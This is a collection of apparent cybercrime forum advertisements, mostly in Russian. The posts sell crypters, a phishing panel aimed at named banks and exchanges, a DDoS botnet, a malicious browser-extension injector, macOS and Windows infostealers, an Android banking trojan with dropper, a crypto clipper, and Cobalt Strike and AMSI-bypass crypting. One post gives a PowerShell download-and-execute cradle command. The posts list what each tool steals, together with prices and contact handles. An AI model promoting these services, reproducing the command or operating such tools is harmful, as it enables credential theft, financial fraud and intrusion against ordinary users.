условиях массовых глобальных прогрузов и со временем был доведен до высокой
стабильности. Наш код протестирован в боевых условиях на локерах, ботах,
лоадерах и т.д., все работает и приносит вам запланированные результаты.
(WinLocker, Citadel, ZBot, SpyEye, Ice, Ulocker, Smoke Loader) High quality
code. Maximum execution rate.
**
[ Без зависимостей]** У нас криптор собственной разработки на чистом C без
каких-либо зависимостей и работает на всех современных ОС Windows. Никаких
тяжелых .NET, VB, Delphi, только чистый код для выполнения нужного алгоритма!
PlainC + ASM only.
[ Новые технологии] Криптор постоянно совершенствуется и дорабатывается по мере возникающих идей по реактивной чистке и реакции на действия аверов. Everyday engine improving.
[ Уникальность] Для клиента дается уникальный криптор, который не зависит от других клиентов. Если ваши файлы спалились, то только от ваших же прогрузов. Мы не набираем >10000 клиентов, только аккуратная Premium- поддержка, клиенты единичные. We make only unique stubs for a customer.
[ Автокрипт] Автокрипт работает на наших VPS и каждый раз при детекте чистые файлы заливаются на ваши FTP. Autocrypt when your files detected and cleaned again.
[ Нотификации] Нотификации в Ваш jabber о смене стаба и обновлении файла. Jabber-notifications when your files updated.
[ Наши контакты] Jabber: mrlapis@exploit.im - основной, mrlapis@jabber.ru - резерв.
Правила сервиса (обновлено 05.2018)
Касается текущих и новых клиентов
Чтобы всё было ок кидайте файл заранее, например за день, чтобы мы смогли
успеть подготовить уник стаб.
Работа с нами автоматически означает согласие с правилами.
Отдельные пункты правил можно подвинуть по отдельной договоренности.
![](/proxy.php?image=https%3A%2F%2Fi.ibb.co%2FTvcXGyG%2Flogo- removebg.png&hash=85785abf6ac5d6b1f3ad7c8cab4e4e70)
[EN]
Greetings forum users.
Today we introduce you Kraken Live Phishing Panel. A powerful phishing tool
with more than 75 phishing pages including banks, crypto exchanges, social
media and more. The panel lets you control what victim sees on screen and
collect required information to breach security measurements in real time. The
panel includes a built-in url shortener. To understand how this tool works,
please watch the video below. Also you can find a list of available phishing
pages below. We will add new phishing pages upon buyers’ requests.
The price includes all hosting and domain costs. You can start using the panel
as soon as you make the payment. Escrow is accepted with buyer paying the fee.
Testing only available for moderators and buyers who are looking to buy life-
time license with price deposited on their account.
[RU]
Приветствую пользователей форума.
Сегодня мы представляем вам фишинговую Kraken Live Panel. Мощный инструмент
для фишинга с более чем 75 фишинговыми страницами, включая банки, криптобиржи,
социальные сети и многое другое. Панель позволяет контролировать то, что
жертва видит на экране, и собирать необходимую информацию для взлома системы
безопасности в режиме реального времени. Панель включает в себя встроенный
сокращатель URL-адресов. Чтобы понять, как работает этот инструмент,
пожалуйста, посмотрите видео ниже. Также вы можете ознакомиться со списком
доступных фишинговых страниц ниже. Мы будем добавлять новые фишинговые
страницы по запросу покупателей.
Цена включает в себя все расходы на хостинг и домен. Вы можете начать
пользоваться панелью, как только произведете оплату. Принимается условное
депонирование с оплатой комиссии покупателем. Тестирование доступно только для
модераторов и покупателей, которые хотят приобрести пожизненную лицензию с
внесением стоимости на свой счет.
Spoiler: Phishing Pages / Фишинговые страницы
Australia
ANZ
Commonwealth Bank
National Australia Bank
Westpac
Brazil
Banco Bradesco
Banco do Brasil
Banco Itaú
Nubank PJ
Canada
CIBC
Desjardins
PayPal CA
RBC Royal Bank
Scotiabank
TD Canada
Germany
Deutsche Kreditbank
ING Deutschland
PayPal DE
Postbank
Sparkasse
Volksbanken Raiffeisenbanken
Spain
Banco Sabadell
BBVA
CaixaBank
N26
PayPal ES
Santander
France
Caisse d'Épargne
Crédit Mutuel
L'Appli SG
La Banque Postale
Ma Banque
Italy
Banca Intesa Sanpaolo
BNL
Fineco
ING
MPS Bank
UniCredit
Mexico
Banco Azteca
Citibanamex
Mercado Pago
Santander MX
Turkey
Garanti
Halkbank
VakıfBank
Ziraat Bankası
İş Bankası
United Kingdom
Barclays Bank
Halifax
HSBC UK
Lloyds Bank
PayPal UK
United States
Bank of America
Capital One
Cash App
Chase Bank
Chime
PayPal US
Venmo
Wells Fargo
Crypto Exchanges
Binance
Bybit
Coinbase
Crypto.com
OKX
Credit Card Grabbers
Credit Card_de
Credit Card_en
Credit Card_es
Credit Card_fr
Credit Card_it
Credit Card_pt
Credit Card_tr
Social Media
Facebook_en
Facebook_es
Google
Instagram_en
Instagram_es
TikTok_en
TikTok_es
Price / Цена
1 week / неделя - $100
1 month / месяц - $200
6 months / месяцев - $500
Life-time / Пожизненная - $1000
Hello guys, I wanted to collaboration with who wants to build their own DDoS
Botnet.
If you provide servers I can let you use for free while I'm developing it.
It's mirai based but with additional encryptions, custom methods and more.
PM me for more collaboration.
Всем привет!
Spoiler: Предыстория
Начну с небольшой предыстории. За свою теперь уже достаточно продолжительную киберкрайм карьеру я успел поработать с разнообразнейшим зоопарком малвари и партнерок. Среди них были и стилеры, и дрейнеры, и вредоносные расширения, и много чего еще.
У каждого из этих типов ПО есть как плюсы, так и минусы. Факт.
На плюсах сосредотачиваться не буду, они широко известны и описаны в соседнем
торговом разделе. Расскажу про минусы и свой субъективный экспириенс.
Нерезидентность. Я думаю не открою ни для кого Америку - стилер стучит один
раз.
Куки умерли? Перезаводи. Не отстучало? Перезаводи. Где-то лагануло?
Перезаводи.
Многие команды решают эту проблему арендуя сразу несколько стилеров и прогружая их совместно, но для меня это всегда звучало как костыли.
Спору нет, на рынке достаточно достойных продуктов и с большинством из них я уже успел поработать. Но когда твою нагрузку запускает чел с парой сотен тысяч вечнозеленых на кошельке, а потом ты по факту узнаешь, что "Экзодус не сграбило" - кресло начинает неистово дымиться.
Сколько трафа отлито, сколько перелито на это чудесное изобретение
человечества. Еще в этом году траффер, с которым я сотрудничал, обновил своего
железного коня, а я обеспечил ребенка недвижкой навырост.
Но мета меняется.
Что мы видим сегодня? Каждый второй траффер льет на дрын, а каждый первый пользователь уже узнает ту самую модалку из тысяч других. Лить стало больно, сложно и не так профитно, как год назад. Профит сводится к "словить на дурачка". Поляна выжжена, и по-настоящему в игре остались только крупные (или отчаянные) игроки.
Как только я начал работать с расширениями, мой мозг мог выдать только одно слово - имба. Модульность, резидентность, возможность менять стратегию "на лету" за счет инжектов - ну сказка, а не софт.
Но как бывает в каждой сказке, не обходится без ложки дегтя. В моем случае дегтя было столько, что впору было открывать свой мыловаренный завод.
Чудесный манифест 2, в котором ты прописываешь разрешение воровать и воруешь, сменился на отвратительный манифест 3. Все обмазали виртуализацией, запретили доступ к самым сочным апи браузера и вообще сказали - жулик, не воруй.
Из-за отсутствия на рынке софта, удовлетворяющего все мои поребности, вариантов оказалось не так много:
Ну и как вы понимаете, я был бы не я, если бы просто сидел на жопке ровно и ждал джва года (а грабить корованы хотелось уже сейчас).
Было принято решение разработать собственный инструмент для внепланового
обогащения.
Перед командой стоял ряд задач, которые необходимо было решить:
Короче хотелось сделать такой продукт, чтобы можно было сначала его прогрузить, а уже потом подстраивать функционал и выбирать способы монетизации.
Как мы это решили:
На данный момент продукт вступил в фазу закрытого бета-теста.
Есть ряд незакрытых вопросов и развилок на пути разработки. И если с фантазией
у нас нет проблем, то потребности клиента всегда разные.
Поэтому я хотел бы призвать силу форума, и попросить вас ответить на следующие вопросы (конструктивно и по сути):
Буду очень признателен за развернутую обратную связь. Это действительно
поможет мне с командой сделать крутой и эффективный продукт.
Топ предложений и идей внесем в роадмап и по возможности включим в официальный
релиз.
Всех обнял, и всем удачной охоты.
После получения обратной связи от форумчан, мы с командой доработали продукт и реализовали необходимый функционал. Огромное спасибо всем, кто ответил в теме и в личке, проявил интерес и просто поддержал проект добрым словом.
Давайте сразу без прелюдий расскажу, что из себя представляет система iNARi и кому она может быть полезна.
Это браузерное расширение для сбора информации и реализации комплексных и многоуровневых таргет атак.
Каждый участник форума находится здесь, чтобы заработать денег. И для всех очевидно, что каждый это делает по своему. Мы разработали систему, которая объединяет и усиливает популярные методы работы и векторы атаки.
Льешь трафик на дрейнер?
Раньше приходилось тратить время на копирование сайтов, покупку доменов и
борьбу с блокировками.
Теперь достаточно, чтобы мамонт зашел на оригинальный сайт!
iNARi позволяет навесить дрейнер на любую кнопку для желаемых сайтов
посредством инжекта.
Работаешь со стилерами?
Раньше у тебя была одна попытка, чтобы собрать данные.
Теперь ты можешь получать свежие куки по одному клику в панели!
iNARi - резидентный софт на JS, работающий внутри Chrome, что позволяет
существенно увеличить жизненный цикл ботов.
Работаешь с сетями?
Раньше приходилось брутить впн и мастерски использовать СИ для получения
доступа.
Теперь можно подменять email прямо в почтовом ящике, делать скриншоты,
подгружать дополнительный софт, провоцировать клиента и перехватывать
логины/пароли в режиме реального времени!
iNARi открывает широкий спектр возможностей для сбора и анализа
информации.
Работаешь с СС?
Раньше приходилось дежурить 24/7, чтобы отработать материал.
Теперь клиент вводит данные карты прямо в вашей платежке!
iNARi распознает кнопки оплаты и переводит клиента на вашу форму, при
необходимости подставляя сумму/товар/получателя. Также может выступать в роли
сниффера.
Работаешь по банкам/биржам?
Раньше постоянно приходилось бороться с антифродом, искать прокси под гео и
побеждать 2фа.
Теперь клиент отправляет деньги самостоятельно!
iNARi может полностью заменять информацию о состоянии счета, а также
автоматизировать процесс вывода средств, за счет доступа ко всем страницам
браузера.
Работаешь с белыми/серыми вертикалями?
Раньше приходилось фармить аккаунты, проходить модерацию и перебивать
конкурентов на аукционе.
Теперь клиент всегда видит твой оффер!
iNARi идентифицирует рекламные блоки на сайтах и подменяет их на
необходимые заказчику. При необходимости можно использовать пуши и нативные
уведомления на любых страницах.
Кому не подойдет:
Разработка инжектов под ваши задачи обсуждается индивидуально, так как занимает некоторое время (в зависимости от сложности инжекта)
Начало сотрудничества: пишете в ПМ, указываете вертикаль и способ монетизации. Обсуждаем доработки и адаптацию функционала, если это необходимо. Создаем отдельный чат, где будем в дальнейшем взаимодействовать. Разворачиваем инфраструктуру и приступаем к работе.
Мы не конвейер массового производства. Каждый проект для нас - это индивидуальная история успеха, которая требует:
Со своей стороны мы гарантируем персональное внимание к вашему проекту и прямую коммуникацию с командой разработки.
Важное примечание:
Мы ценим время наших клиентов и свое. Поэтому перед началом работы проводим обязательный предварительный анализ совместимости нашего решения с вашими потребностями. Это позволяет избежать пустых обещаний и гарантировать результат.
С уважением, Patr1ck
Мы рады представить вам наш новый сервис, который предоставляет услугу под ключ в создании решений по доставке ваших файлов под любой вид трафика. К каждому заказу мы подходим с уникальным решением, используя новейшие системы пейлоадов и другие передовые технологии.
Особенности сервиса:
• Обфускация : Скрывайте исходный код и структуру, обеспечивая их защиту
от анализа.
• Использование пейлоадов : Интеграция передовых систем пейлоадов, включая
JS, VBS и HTA.
• Создание разводок : Генерация качественных PDF и HTML файлов для
различных сценариев.
• Многопоточные решения: Оптимизация процессов для быстрой и эффективной
работы.
• Доставка от А до Я : Полное сопровождение процесса – от создания до
доставки файлов под ваш вид трафика.
Цена под ключ реализации проекта от 250$
Мы предлагаем вам решения, которые облегчат вашу работу с трафиком и сделают её более эффективной.
Контакты :
Telegram : @LusiSup (Много фейков, проводи вериф в пм)
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2Fjd9wGmWX124LUl8A5TCrxkRbv0YeDCqlFBYhDzI9iMeWkxuCB2PnQDJMgHikzlCS9Px7-lcnekz18dUi- Qu0LeZY8kalvfVVNkAjB8At8I_0-kiORSYPmCfME4XJ_A3c3aJL9Azjgq_x3Dot6pMCNJaHFqaEx2i_HMutIvdY4PAJvjFgC099aqb32DKQB2_6oq4Z-8S4eWXGWgnM- DP7MO0hmex073GgoKsn6UEiwcj1O15-Mqojum7KBsFv74ZgreeNVvTpMgZOOO8UnGJa9uxI6dNijYDO34xI7wg3Dlu78yCycbdgEHcnXY7VqXzyHnel0X_nJBcVhxnlfNz52g.jpg&hash=0202061206e2c4f9b386888e3e3a6466&return_error=1)
You can contact @LusiSup right away.
t.me
Tox : 0101B013141C2B44C295F3717563E2F74DEF2FF621387FB981CBC611B622C2445238CFBFBA99
EN:
We are pleased to introduce our new service, which provides a turnkey solution
for delivering your files under any type of traffic. We approach each order
with a unique solution, utilizing the latest payload systems and other
advanced technologies.
Service Features:
• Obfuscation: Hide source code and structure, ensuring protection from
analysis.
• Payload Usage: Integration of advanced payload systems, including JS, VBS,
and HTA.
• Decoy Creation: Generation of high-quality PDF and HTML files for various
scenarios.
• Multithreaded Solutions: Optimization of processes for fast and efficient
performance.
• End-to-End Delivery: Full process support – from creation to delivery of
files under your type of traffic.
We offer solutions that will ease your work with traffic and make it more efficient.
Escrow ONLY
**Привет всем!
Рады вам представить наш новый продукт - macOS stealer “Banshee Stealer”.
Обширный функционал, красивый дизайн, скорость - все это “Banshee Stealer”.
VIDEOS in TELEGRAM CHANNEL!!!
(TELEGRAM CHANNEL: https://t.me/stealer_banshee)
VIDEOS in TELEGRAM CHANNEL!!!**
PRICE: 1500$ (month)
**Contacts:
TOX:
88D59D5A4667DD4404666C083C65E1BD303A9AA3A59029054519895292C8A23FBB6A49B01370
Telegram: https://t.me/kolosain
Escrow ONLY
Функционал:**
Spoiler: BROWSERS
- Safari (Cookies)
- Chrome (Autofills, Passwords, Cookies, Wallets, Cards)
- Firefox (Autofills, Cookies)
- Brave (Cookies,Passwords,Autofills, Wallets, Cards)
- Edge (Cookies,Passwords,Autofills, Wallets, Cards)
- Vivaldi (Cookies,Passwords,Autofills, Wallets, Cards)
- Yandex (Cookies,Autofills, Wallets, Cards)
- Opera (Cookies,Autofills, Wallets, Cards)
- OperaGX (Cookies, Autofills, Wallets, Cards)
Spoiler: Extension WALLETS
Authenticator
Binance
Bitapp
BoltX
Coin98
Coinbase
Core
Crocobit
Equal
Ever
ExodusWeb3
Fewcha
Finnie
Guarda
Guild
HarmonyOutdate
Iconex
Jaxx Liberty
Kaikas
KardiaChain
Keplr
Liquality
MEWCX
MaiarDEFI
Martian
Math
Metamask
Mobox
Nami
Nifty
Oxygen
PaliWallet
Petra
Phantom
Pontem
Ronin
Safepal
Saturn
Slope
Solfare
Sollet
Starcoin
Swash
TempleTezos
TerraStation
Tokenpocket
Ton
Tron
Trust Wallet
Wombat
XDEFI
XMR.PT
XinPay
Yoroi
iWallet
- Более 100 расширений, включая наиболее популярные
Spoiler: Desktop WALLETS
- Electrum
- Binance
- Exodus
- Atomic
- Coinomi
Spoiler: EXTRA
- Сбор заметок из Notes
- Keychain (Дамп всех сохраненных паролей пользователя)
- SystemInfo (Полная информация о системе)
- MacOS Password
- Скрыта консоль при запуске софта
Spoiler: SUPER EXTRA
- Красивая веб-панель.
- Красивый dmg установщик.
- Отстук в телеграмм(лог + уведомление)
**Панель:
Предоставляю услуги крипта Cobalt Strike и powershell скриптов.
Техника происходит через патч амси в контексте powershell и запуск скрипта.
Каждому клиенту выдается отдельный обфусцированный код, который не
детектируется неограниченное количество времени за счет специфки самого
обфускатора.
Услуги:
1. Крипт Cobalt Strike ps1 payload с автовосстановлением сессии.
- В любой момент можете заменить payload или выставить несколько payload в
веб-админке
- Запуск через команду IEX(New-Object Net.WebClient).downloadString()
- Если был детект или убит процесс в контексте которого работает CS, то
сессия автоматически восстановится
2. Крипт Powershell скриптов с админки.
- Крипт любых powershell скриптов с обходом амси
- Удобная веб админка, в котором можете выставить raw ссылку на powershell
скрипт например как мимиказ
- Возможность прямо в админке вставить powershell скрипт
- Запуск через команду IEX(New-Object Net.WebClient).downloadString()
Важное примечание:
Вся техника работает с веб админки, где есть готовые скрипты которые обходят
амси. Крипт на лету. Сперва через вышеуказанную команду исполняется обход амси
3. Обфусцированный скрипт powershell для обхода амси
- Простой скрипт без зависимостей для обхода амси
4. Крипт Powershell скрипта
- Крипт скрипта через raw ссылку
5. Крипт NET exe через powershell
- Крипт net бинаря по прямой ссылке
- Запуск через powershell команду
P.s. Весь крипт происходит через обфускатор, который при каждой генерации выдает уникальный скрипт. Рекрипт не требуется! К примеру один крипт держится в моей работе уже пол года.
Прайс лист:
Услуга 1 и 2 (комплект) - 3к$/мес оплата без учета на затраты серверов - 24/7
поддержка
3 - 790$
4 - 790$
5 - 790$
При приобретении услуги 1 и 2 на остальны услуги 20% скидка!
Места на крипт и услуги ограничены - при наборе достаточного количества
клиентов сервис будет недоступен.
Согласны на гаранта xss и exploit.
Мемберам с депом или с хорошей регой - первым отправлю код.
Работаем без выходных и праздников.
За всеми контактами в пм.
Spoiler: Закрыто на депозит: $10k
РАБОТА СТРОГО ЧЕРЕЗ ГАРАНТА ФОРУМА
Есть в наличиии Дропер и Бот.
Написаны с нуля, язык Kotlin.
Работают на Android 9-14
Тестировались на реальных девайсах с Android 14: samsung, google, xiaomi,
honor, oppo, oneplus, realm, vivo
Droper.
---------------------------------------------------------
Просит одно разрешения на установку из неизвестных источников.
Распаковывает тело бота из папки assets т.е. хранит тело бота внутри своего
apk.
Алгоритм работы:
Установка
Диалог о необходимости выдать разрешение на установку из неизвестных
источников для обновления приложения
При получении разрешения автоматически начинается установка бота
После установки запускается активити бота указаная в дропере
Дропер могу исполнить с разными вариациями, например запуск видео с
презентацией или заставкой под белое приложение,
различные диалоги повышающие мотивацию на выдачу разрешений.
Bot.
------------------------------------------------------------------------------------
Реализован по схеме: бот -> гейт -> панель (где гейт это vps выступающая
прокси шлюзом)
Коммуникация с панелью реализована на сокетах т.е. команды/логи приходят в
режиме реального времени.
При первом запуске на 13-14 андроид просит права на отправку пушей, затем идет
диалог мотивации выдачи аксесабилити прав.
При получении аксесабилити прав накрывает все оверлеем под которым получает
все необходимые права.
Если же аксесабилити прав нет и закрыта активити установки, то будет
напоминать пушами о необходимости завершить установку.
Базовый функционал:
Hidden Icon - скрывает иконку при установке
VNC
HVNC - работа под оверлеем или черным экраном
Input/Clipboard - отправка текста из панели в строку, получение текста из
clipboard в панель
Overlays - несколько оверлеев: черный экран, имитация системного обновления,
имитация загрузки
Device block - блокировка экрана без админ прав
Camera - присылает раз в 5сек снимок с фронтальной камеры
keyloger
get push
send push - отправляет пуш с вашим текстом, при клике по пушу открывает инжект
Injects - all hook Injects
get apps - получает список приложений (автоматом проверяет на наличие
инжектов)
open app - открывает любое приложение
delete app - удаляет любое приложение
send sms
receive sms
hide sms - устанавливает себе в качестве дефолтного sms manager
call forwarding
block numbers - Блокирует входящие, как по отдельному номеру так и все сразу
send ussd
sound off
sim info
connection type - wifi or cell
battery info - %
charger info - on/off
killbot
Multi command - отправка команд выбранным ботам
Auto Command - отправка команд автоматически всем ботам при установке
Это минимальный функционал, по желанию заказчика могу разработать с нуля или
добавить любую опцию из выложенных в открытый доступ исходников,
сделаю реверс некриптованого apk при необходимости. Добавлю ваши инжекты,
разработака воронок под получение данных.
Короче любой каприз за ваши деньги.
Crypt.
--------------------------------------------------------------------
Крипт пока идет бонусом, раз в сутки выдается новый криптованый файл. Криптую
пока руками.
Бот и дропер криптуются на уровне исходников, далее стандартными средствами с
кастомными настройками.
На моих тестовых объемах крипт работает без детектов, как поведет себя в бою я
х.з. поэтому пока бонусом.
Если будет спрос сделаю автоматическое криптование за доп плату.
В любом случае вы можете воспользоваться сторонними крипторами.
Условия сотрудничества.
--------------------------------------------------------------------
Аренда включает дропер, бот, панель (на моем сервере), 1 домен, 1 гейт, крипт
раз в сутки.
Ваши расходники это домены (соединение происходит через https) и впски для
гейтов, т.е. 1 домен = 1 гейт
Приоритет будет отдаваться адекватным людям с опытом, работающим по конкретным
гео и набору приложений, с кастомизацией бота
это позволит оставить лишь необходимый функционал исключив все лишние тригеры,
что благотворно скажется на живучести продукта.
Оплата только после собеседования, могу отказать без объяснения.
Оплата только через ГАРАНТ данного форума.
Сумма небольшая лишь что бы отсеять шелуху.
Аренда первого месяца $500, далее будем обсуждать в приоритете %
Гарантия.
---------------------------------------------------------------------
Над секретами не дрожу (я себе еще напишу ))), поэтому 24ч манибэк если кого
то не устроит!
Продукт новый написан с нуля будет поддерживаться и модернизироваться.
Панель тестировалась одновременно 100+ ботов онлайн.
Бот протестирован на реальных устройствах описаных выше.
Но могут быть баги-лаги и прочая нечисть. Все будет фиксится, но на все надо
время, прошу понять!
Ограничения.
--------------------------------------------------------------------
Бот не будет запускаться на устройствах бывшего СНГ.
Использование.
--------------------------------------------------------------------
Софт поставляется в образовательно/ознакомительных целях.
Автор не несет ответственности за использование софта третьими лицами.
Контакты
--------------------------------------------------------------------
telegram: https://t.me/zigotes
tox:
842AC7D8E0DD61E69C5D4F9289BE039C93510446EF54BBAB670754BE157D1F1F87D2D46432A1
**РАБОТА СТРОГО ЧЕРЕЗ ГАРАНТА ФОРУМА
**
Spoiler: Закрыто на депозит. Closed for deposit.
Hello everyone,
I worked with a developer to improve the Cobalt Strike Artifact Kit and reflection loaders. This effort yielded significant advancements in my battle against EDRs, XDRs, and AVs.
ITS FUD BEHAVIOR AND STATIC.
Key features include:
- more than 5 evasion techniques
- Anti-debugging
- Fully customized from scratch
- LLVM obfuscation
I am looking to sell this code as I am finished with it. It will be sold to one customer only.
Escrow only.
DM me with your price.
I can provide a beacon for you to test, scan, and analyze its detection, both on-disk and in-memory.
Disclaimer: I am not responsible for any harmful activities conducted using this code. The buyer assumes all responsibility for its use.
**Clipper поддерживает самые популярные сети более 17шт, список постоянно пополняется.
Функционал билда:**
Функции подмены:
Бесплатные модули по запросу:
Полный контроль, нет привязок к моим серверам или кошелькам, я выдаю вам *.exe файл сразу с вашими кошельками в нем.
Разрешено лить без крипта при условии что запросите бесплатную обфускацию.
Актуальный детект с обфускацией: https://avcheck.net/id/XcwPvGB1hjA1Click to expand...
Ребилды делаю в течении 2х суток с момента покупки бесплатно.
Дальнейшие обновления и ребилды за полную стоимость.
Стоимость билда:50$
Исходный код проекта: 200$
Скан на avcheck.net при выдаче билда, бесплатно.
Контакты:
t.me
Code:Copy to clipboard
8EC098E2838D06DEF4ACD35006836CB5E1E35FBB8E1E119EA1BE1FEBBDAD440713BED6847DA6
Сделки через гаранта/авто-гаранта данного форума.
Комплект Cobalt Strike 4.9.1 + Redirector - $300
Если нужен домен для редиректора, то + $50
Для каждой инсталяции создается уникальный профиль Cobalt Strike. Комплект не работает для таргетов из СНГ.
Тимсервер устанавливается на ВАШ VPS.
Для заказчиков, один бесплатный крипт маяка на каждый комплект. Примерный скан крипта выглядит как-то так https://scanner.to/result/wGKREBnPsL
Для комманд возможны отдельные предложения.
Первый контакт в ПМ, далее TOX
Первым тест-драйверам - бесплатно. Далее ~50.
От Вас:
1. Разрядность х86 или х64.
2. Тип dll или ехе.
3. Каков должен быть размер в байтах(примерно).
4. Нужно ли самоуничтожение.
5. Нужен ли старт на полностью голой винде(~ +250 Кб к размеру).
6. Через сколько секунд/минут/часов должен быть старт нагрузки после запуска
крипта. Может какой-то особенный триггер, на IP/MAC/имя PC/USER и т.д. и т.п.
7. Свои пожелания (автозагрузки/автостарта/закрепа нет, пока нет). Идей
вагон, типа можно глушить дефендер, можно модифицировать метод(ы) шифрации и
т.д. и т.п.
8. Дабы не терять время - можно выложить нагрузку на qaz.im - криптану,
выложу куда скажете.
**До:
После:**
Почему так вырос???
Full source code with txt manual + videos - 2000$ .
Due to the departure of the coder and many scam telegram channels on my botnet
I am selling it .
Spoiler: Tutorial Videos
Size: 60-100mb.
Prices:
ZIP****70$ / day
MSI****80$ / day
ZIP170$/ week + replaces.
EV + ZIP 220**$/ week (without change icon).
MSI 180$****/ week.
Hosting on customer or mine. Хост на мне или на вас.
Disabling windows defender runtime protect + add exclusion. Silent execution.**
Отключение дефендера и добавление исключения.
Blocking bots, knocking about new install to telegram. Отстук в телеграмм.
----
Spoiler: Закрыто на депозит
Price:
$200/1 month
Features:
- easy to use web panel.
- blocks CIS countries
- cross platform (linux,windows)
Stealer collects:
| Windows| Linux
---|---|---
Host information|
|
Chrome based browsers|
|
Gecko based browsers|
|
Browser Extensions|
|
Crypto wallets|
|
Files with keywords|
|
Pidgin|
|
Telegram|
|
Mullvad|
|
OpenVPN|
|
WinSCP|
|
FileZilla|
|
Remmina|
|
TightVNC|
|
UltraVNC|
|
TigerVNC|
|
MightyViewer|
|
Git credentials|
|
SSH folder|
|
Spoiler: Browsers
360Browser
7Star
Amigo
Brave
Catalina
CentBrowser
Chedot
Chrome
Chromium
CocCoc
Coowon
DCBrowser
Dragon
Edge
Elements
EpicPrivacyBrowser
Fenrir
Iridium
K-Melon
Kometa
Liebao
Maple
Maxthon
Opera
OperaGX
Orbitum
QIPSurf
Slimjet
Sputnik
Thorium
Torch
URBrowser
Uran
Vivaldi
Yandex
SeaMonkey
WaterFox
Thunderbird
IceDragon
Cyberfox
BlackHaw
Pale Moon
Mercury
Librewolf
Firefox
Spoiler: Wallets
Zcash
Armory
Bytecoin
Jaxx
Exodus
Ethereum
Electrum,
AtomicWallet
Guarda
Coinomi
feather
mymonero
Spoiler: Extensions
Authenticator
Binance
Bitapp
BoltX
Coin98
Coinbase
Core
Crocobit
Equal
Ever
ExodusWeb3
Fewcha
Finnie
Guarda
Guild
HarmonyOutdated
Iconex
Jaxx Liberty
Kaikas
KardiaChain
Keplr
Liquality
MEWCX
MaiarDEFI
Martian
Math
Metamask
Metamask2
Mobox
Nami
Nifty
Oxygen
PaliWallet
Petra
Phantom
Pontem
Ronin
Safepal
Saturn
Slope
Solfare
Sollet
Starcoin
Swash
TempleTezos
TerraStation
Tokenpocket
Ton
Tron
Trust Wallet
Wombat
XDEFI
XMR.PT
XinPay
Yoroi
iWallet
Spoiler: Закрыто на депозит
Glitch stealer
Сегодня состоялся долгожданный релиз Glitch stealer. Приобрести вы можете через бота уже сейчас!
️Release 27.07.2024 "Заря"
Представляю вашему вниманию Glitch stealer. Неповторимый продукт с уникальными технологиями подойдёт как командам профессионалов, так и совсем новичкам в сфере трафика. Glitch удивит пользователей своей простотой использования, скоростью отстука и удобством. Панель сочетает в себе неоновый минималистичный дизайн, удобную навигацию по страницам и молниеносный отклик.
Полная документация к продукту :
Панель
:
Язык
программирования: PHP + JavaScript
Telegram
отстук: возможность установить своего бота для отстука, чтоб не заходить
каждый раз в панель
Полный
контроль над логами: помечайте, удаляйте, сортируйте логи как вам угодно.
Гибкий
в настройке билдер: выбор разрядности, список расширений для сбора, глубина
рекурсивного поиска для граббера файлов, дополнительные чекбоксы.
Защита
от обнаружения Shodan'ом и другими сканерами
Локальная
авторизация: панель связывается с нашим сервером всего один раз — при
регистрации
Билд
:
Язык
программирования: С/C++
Использование
преимущественно низкоуровневых Ntdll функций
Сбор
информации о ПК жертвы: скриншот в формате .png, IP-адрес, страна, уникальный
hardware id машины, имя пользователя, имя компьютера
Сбор
данных с более сотни браузеров на базе Chromium и Gecko: cookie-файлы,
сохранённые пароли, закладки и история
Сбор
криптокошельков с десктопных приложений и с браузерных расширений на основе
Chromium и Gecko
Сбор
Google токенов для уязвимости multilogin
Сбор
других приложений и мессенджеров: сессии Telegram, файлы и токены Steam,
токены Discord
Специальная акция! Всем покупателям Glitch stealer , кто оформит подписку в течение следующих двух недель, начиная с сегодняшнего дня (27.07.2024), получит Glitch clipper в подарок на тот промежуток времени, на который оформит Glitch stealer
На СНГ тачках не отрабатывает и не будет отрабатывать
За отзыв/на тест не даю. Переживаешь за свои бабки - используй
гаранта/кошелёк с мультиподписью.
Уже активные пользователи могут получить дополнительные дни подписки,
оставив отзыв
Цена подписки
1
месяц: ~~200$~~ -> 150$
3
месяц: ~~450$~~ -> 350$
LifeTime: ~~1000$~~ -> 850$
️Успей купить, пока идёт акция при открытии️
Контакты:
️Telegram
channel (ID: -1001973186772)
️Support
in Telegram (ID: 6576043437)
️Telegram
bot (ID: 7268858071)
️Xss
PM
️Xss
Thread
Сдается в аренду powershell бот с автоматической обфускацией. Все подробности под спойлерами.
Spoiler: Модули
-Stealer. Собирает куки, логины, пароли и СС на Chromium и FF based браузерах, холодные криптокошельки, файлы телеграма, логины и пароли pidgin и PSI, данные для входа FTP из Filezilla, TotalCommander и WinSCP. Данные с хрома расшифровываются на боте с помощью DPAPI. В случае с фф файлы БД выгружаются в админку и расшифровываются с помощью стандартных либ самого фф.
-Grubber. Есть возможность задать пути и расширения файлов, после выполнения их поиска на боте выбираются нужные и производится их выгрузка. При помощи связки TV и Shell, можно точечно выгружать необходимые файлы, предварительно в реальном времени посмотрев расширения, пути и названия файлов.
-Socks. Поднимаете сокс на боте, подключаетесь к нему через релей, адрес и порт которого вам выдаст админка, на выходе имеете IP адрес самого бота. Работает на браузерах и антиках, не работает с proxifier. Если на самом боте нет никаких проблем со скоростью интернета или производительностью ПК, выдается приемлемая скорость, в районе 20-30 мбит/с.
-TV. Транслирует в панель все, что происходит на мониторе бота. Запускается параллельно с шеллом.
-Shell. Принимает любые powershell команды. Для разных команд сохраняется одна область видимости переменных. То есть, присвоив значение какой-либо переменной одной командой, эту переменную можно использовать в последующих командах. Шелл запускается с предварительно отключенным AMSI.
-Hidden browser. Является аналогом hvnc. Скрытно поднимает браузер с уже
подгруженным в него профилем (а следовательно куками, паролями и тд) кх и
предоставляет возможность удаленного управления им через панель. Никаких
клиентов не требуется, весь функционал в вебе.
Видеопоток транслируется с помощью кодеков вместо распространенного варианта с
отправкой скриншотов, что значительно уменьшает нагрузку на сеть, также
имеется возможность налету изменять качество транслируемой картинки: изменять
тип драйвера, cжатие, количество кадров в секунду, качество кадров,
соотношение и др.
Модуль может работать в двух режимах:
Первый стандартный, в случае с ним браузер поднимается в headless моде,
работает немного быстрее, но на некоторых сверхфродовых сервисах (прим.
Coinbase) могут возникнуть нюансы с авторизацией/отработкой материала.
Второй - авторский, при его использовании для антифрод систем абсолютно все
выглядит так, как будто на сайт зашел сам кх, что было протестировано на
множестве контор (включая высокофродовые). Отлично подходит для работы с любым
типом материала и отработки/регистрации ваших контор. Модуль работает только с
chrominum based браузерами (Edge, Chrome, etc).
Spoiler: Фичи, краткое описание продукта
